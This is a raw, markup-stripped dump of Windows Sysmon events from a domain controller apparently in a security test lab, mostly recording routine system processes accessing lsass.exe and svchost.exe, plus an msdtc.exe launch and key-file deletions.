154100x80000000000000008527Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:02.415{266CAFBE-64F6-6064-0501-00000000AE01}4136C:\Windows\System32\msdtc.exe2001.12.10941.16384 (rs1_release.160715-1616)Microsoft Distributed Transaction Coordinator ServiceMicrosoft® Windows® Operating SystemMicrosoft CorporationMSDTC.EXEC:\Windows\System32\msdtc.exeC:\Windows\system32\NT AUTHORITY\NETWORK SERVICE{266CAFBE-646C-6064-E403-000000000000}0x3e40SystemMD5=308F08347923DEEDE7BC03EC7D485841,SHA256=72DB45CA11FE635DF9F8273C38CBEFB8DF5362ADA0CBF6D2B1E570365DC700C0,IMPHASH=D02F3DF332409C5D3F34BA2D38FC4ED4{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000008526Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:02.409{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008525Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:02.409{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008524Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:02.409{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008523Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:02.269{266CAFBE-646A-6064-0A00-00000000AE01}8403012C:\Windows\system32\services.exe{266CAFBE-64F6-6064-0401-00000000AE01}3744C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008522Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:02.269{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-64F6-6064-0401-00000000AE01}3744C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008521Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:02.269{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-64F6-6064-0401-00000000AE01}3744C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008520Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:02.269{266CAFBE-646A-6064-0A00-00000000AE01}840900C:\Windows\system32\services.exe{266CAFBE-64F6-6064-0401-00000000AE01}3744C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+1643d|C:\Windows\SYSTEM32\ntdll.dll+7f3fd|C:\Windows\SYSTEM32\ntdll.dll+3a890|C:\Windows\SYSTEM32\ntdll.dll+1e892|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008519Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:02.269{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008518Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:02.269{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008517Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:02.269{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008516Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:02.144{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008515Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:02.144{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008514Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:02.144{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008513Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:02.113{266CAFBE-64C4-6064-9B00-00000000AE01}49245328C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C4-6064-9D00-00000000AE01}5112C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\TokenBroker.dll+1158a|C:\Windows\System32\TokenBroker.dll+d335|C:\Windows\System32\TokenBroker.dll+d669|C:\Windows\System32\TokenBroker.dll+1ff53|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e0cc|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x80000000000000008512Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:02.113{266CAFBE-64C4-6064-9B00-00000000AE01}49245328C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C4-6064-9D00-00000000AE01}5112C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\TokenBroker.dll+22ee6|C:\Windows\System32\TokenBroker.dll+114b3|C:\Windows\System32\TokenBroker.dll+d335|C:\Windows\System32\TokenBroker.dll+d669|C:\Windows\System32\TokenBroker.dll+1ff53|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e0cc|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000008511Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:02.082{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008510Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:02.051{266CAFBE-646C-6064-1300-00000000AE01}12281396C:\Windows\System32\svchost.exe{266CAFBE-646C-6064-1200-00000000AE01}1196C:\Windows\system32\svchost.exe0x1440C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|c:\windows\system32\ncbservice.dll+2f95|c:\windows\system32\ncbservice.dll+1969|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008509Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:02.051{266CAFBE-646C-6064-1300-00000000AE01}12281396C:\Windows\System32\svchost.exe{266CAFBE-646C-6064-1200-00000000AE01}1196C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\ncbservice.dll+165c|c:\windows\system32\ncbservice.dll+227a|c:\windows\system32\ncbservice.dll+205e|c:\windows\system32\ncbservice.dll+1bdb|c:\windows\system32\ncbservice.dll+181b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008508Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:02.051{266CAFBE-646C-6064-1300-00000000AE01}12281396C:\Windows\System32\svchost.exe{266CAFBE-646C-6064-1200-00000000AE01}1196C:\Windows\system32\svchost.exe0x1440C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|c:\windows\system32\ncbservice.dll+2f95|c:\windows\system32\ncbservice.dll+17cf|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008507Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:02.051{266CAFBE-646C-6064-1300-00000000AE01}12281396C:\Windows\System32\svchost.exe{266CAFBE-646C-6064-1200-00000000AE01}1196C:\Windows\system32\svchost.exe0x1440C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|c:\windows\system32\ncbservice.dll+2f95|c:\windows\system32\ncbservice.dll+2e77|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000008506Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:02.051{266CAFBE-646A-6064-0B00-00000000AE01}856NT AUTHORITY\SYSTEMC:\Windows\system32\lsass.exeC:\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\Crypto\Keys\de7cf8a7901d2ad13e5c67c29e5d1662_a4ee36bd-fd63-46a0-a49f-c2b42395fbd8MD5=E2B1E53F26985BC0BC2A99C7D107A1D1,SHA256=3DC463A76FC170607C07B104C3CB531362CE7D6E10C1A34E0C0F370AEAE08CE8,IMPHASH=00000000000000000000000000000000falsefalse - shredded file with pattern 0x00 23542300x80000000000000008505Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:02.051{266CAFBE-646A-6064-0B00-00000000AE01}856NT AUTHORITY\SYSTEMC:\Windows\system32\lsass.exeC:\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\Crypto\Keys\de7cf8a7901d2ad13e5c67c29e5d1662_a4ee36bd-fd63-46a0-a49f-c2b42395fbd8MD5=40489A5F251275967BCAC92A594C210C,SHA256=5F54121BB1590A36EBFD2DCDDDF4A66300AA09CE7C9B6B70B6BA132287EBFACA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000008504Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:02.020{266CAFBE-646C-6064-1300-00000000AE01}12281396C:\Windows\System32\svchost.exe{266CAFBE-646C-6064-1200-00000000AE01}1196C:\Windows\system32\svchost.exe0x1440C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|c:\windows\system32\ncbservice.dll+2f95|c:\windows\system32\ncbservice.dll+2e77|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008503Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:02.020{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008502Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:02.020{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008501Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 